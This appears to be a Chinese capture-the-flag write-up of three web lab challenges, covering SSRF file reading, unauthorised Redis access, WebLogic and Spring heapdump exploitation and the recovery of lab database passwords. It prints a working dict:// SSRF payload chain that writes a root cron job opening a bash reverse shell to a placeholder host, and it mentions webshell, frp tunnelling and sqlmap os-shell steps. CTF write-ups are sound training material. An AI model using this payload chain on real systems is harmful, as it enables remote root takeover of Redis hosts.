CTF之web题集详情随手笔记

《Web安全》http://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247484238&idx=1&sn=ca66551c31e37b8d726f151265fc9211&chksm=c0e47a12f793f3049fefde6e9ebe9ec4e2c7626b8594511bd314783719c216bd9929962a71e6&scene=21#wechat_redirect

1 WEB 1

靶场目标:http://43.137.34.103/

可以直观的看到一个爬虫类的网页。用我犀利的眼就能很明显感觉到可能存在SSRF漏洞,所以接下来我直接就看看能不能爬取百度或者当前的网页

直接就跳转了,这里思路直接就使用file命里查看文件。

等到passwd文件和hosts头,判断内网ip范围为172.19.240.0

flag文件在根目录下面

flag1:meetsec1{6d5e5c2bb397ba7727b58df59b35f66a}

接下来是进行内网探测,看看存在其他服务不,可以直接使用ssrfmap工具

这里还是手工做,用bp的自定义迭代器扫描,写一个小脚本

题目提示是数据库服务,但我晚上做的时候两个小时也没有扫出来服务,最后常用端口扫

描,才发现存在一个redis,属于是被绕到了,忘了redis也是数据库

内网探活,172.19.240.7:6379服务,这里应该是redis未授权

得到了第二个flag:meetsec2{2b7cc5b73fe867cc83546583b858c8ab}

第三个flag存在于这台主机的根目录,所以这里就用计划任务上线

复制代码
dict://172.19.240.7:6379/flushalldict://172.19.240.7:6379/config set dir /var/spool/cron/dict://172.19.240.7:6379/config set dbfilename rootdict://172.19.240.7:6379/set xshell "\n* * * * * /bin/bash -i >&/dev/tcp/x.x.x.x/5555 0>&1\n"dict://172.19.240.7:6379/save

第三个flag:meetsec3{f22eec9fb7c498b3a747392ff53a746b}

2 WEB 2

靶场目标43.137.34.103:7001

这个界面,基本都是weblogic服务,直接就查看什么版本

用专门的漏扫看看有没有存在历史漏洞

第一个flag:meetsec1{3e942fd37767def3a9f68cf5ee6ebee5}

第二个flag在内网的第二台主机中,这里先上个哥斯拉

直接上传一个fscan,扫一下内网服务

网段为172.16.10.0/24和172.25.20.0/24

这里不知道是不是,我扫描器的问题,还是靶场的问题,我在备用目标中,才把3306扫出

来,第一个目标并没有扫出来。

这里的到目标是172.25.20.12:3306,通过frp,接入内网

接入到内网中,这里流量时全局,直接用kali,打一手爆破试试

不过在半个小时后,我感觉到了,这里似乎不是弱口令爆破,weblogic可以用jdbc做数据源

连接,可能是做的一个站库分离的操作

在jdbc连接里面找到了数据库的账户和加密密文,从官网查看了解,可以使用官方的解密工

具得到明文,不过需要拿到,一个bat文件

得到密码Meetsec#1024,账户root

用navicat直接连接

得到第二个flag

第三个flag在主机根目录下,这里用sqlmap远程连接os-shell

meetsec3{2e947aef43be6dc428a9c626ba7fb824}

本来想今天把第四个flag拿了的,但是环境打不开了,一直卡住,接下来想从os-shell反弹

shell,在上传文件,扫描第三个内网段

明天看看还能不能打开吧。

3 WEB 3 4

目标43.137.9.106:22883、43.137.9.106:13306

web3给的两个地址,第一个flag是信息泄露,第二个flag是存在数据库中

打开第一个网站界面

看不出东西来,直接扫一下目录试试

从地址看,基本上就是spring的框架,直接看看env变量的文件

得到第一个信息泄露的flag:meetsec1{e20cdd96b8985a3557e5720726bb09a8}

不过也得到了,第二个flag的线索,jdbc连接,数据保留在heapdump里,账户是meetsec

所以下面就是看看这个heapdump怎么解密,

得到密码为MeetSec@2nd!2022

直接用navicat连接

得到第二个flag meetsec2{9edbd4b03b5f86a9abe079bc63ea847b}

相关推荐
松树戈12 分钟前
PostgreSQL使用LIKE右模糊没有走索引分析&验证
数据库·postgresql
文牧之18 分钟前
PostgreSQL 常用日志
运维·数据库·postgresql
TE-茶叶蛋43 分钟前
Redis 原子操作
数据库·redis·缓存
Linux运维老纪1 小时前
Python文件操作及数据库交互(Python File Manipulation and Database Interaction)
linux·服务器·数据库·python·云计算·运维开发
Bruce_Liuxiaowei1 小时前
MCP Python SDK构建的**SQLite浏览器**的完整操作指南
数据库·python·sqlite
数据与人工智能律师1 小时前
正确应对监管部门的数据安全审查
大数据·网络·数据库·人工智能·区块链
2401_897930061 小时前
什么是非关系型数据库
数据库·oracle
鱼丸丶粗面1 小时前
Python 读取 txt 文件详解 with ... open()
linux·数据库·python
拾荒者.1261 小时前
设计一个关键字统计程序:利用HashMap存储关键字统计信息,对用户输入的关键字进行个数统计。
数据库·python·mysql
encoding-console2 小时前
欧拉环境(openEuler 22.03 LTS SP3)安装移动磐维数据库(PanWeiDB_V2.0-S2.0.2_B01)步骤
数据库·虚拟机·欧拉·磐维数据库